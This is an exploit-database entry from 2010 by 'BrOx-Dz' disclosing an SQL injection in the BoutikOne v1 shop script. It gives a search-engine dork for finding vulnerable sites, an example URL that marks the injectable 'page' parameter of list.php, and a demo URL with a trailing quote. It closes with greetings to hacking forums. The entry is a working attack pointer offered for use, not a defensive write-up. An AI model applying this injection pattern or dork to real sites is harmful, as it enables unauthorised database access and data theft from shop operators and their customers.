BoutikOne v1 SQL Injection Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : BoutikOne v1 SQL Injection Vulnerability
# Published : 2010-09-19
# Author : BrOx-Dz
# Previous Title : MOAUB #18 - CMSimple XSRF Vulnerability
# Next Title : Skybluecanvas.v1.1-r248 CSRF vulnirabilitie

  ________  _____________  / /_
  / ___/ _ / ___/ ___/ _ / __/
 (__  )  __/ /__/ /  /  __/ /_
/____/___/___/_/   ___/__/
#####################################################################
# Exploit Title: BoutikOne? v1 (list.php) SQL Injection Vulnerabilitie
# Date: 19/09/2010
# Author: BrOx-Dz
# Author: E.dz@hotmail.fr
# Software Link: http://www.boutikone.com/
# Dork  : Powered by BoutikOne?
# Version: BoutikOne?
# Tested on: windows xp pack 3
#####################################################################

----------------------------------------------------------------------------

#e.g :
http://server/patch/list.php?lang=1&path=50&num=38&action=n&sort=Id&page=0[sql]

#demo :
http://www.site.com/list.php?lang=1&path=42&num=13&action=n&sort=Id&page=0'

----------------------------------------------------------------------------
greatez:

lagripe-dz  mca_crb  amine  halim all dz members.

www.sec4ever.com / www.v4-team.com/cc/ / www.h4ckforu.com/vb/.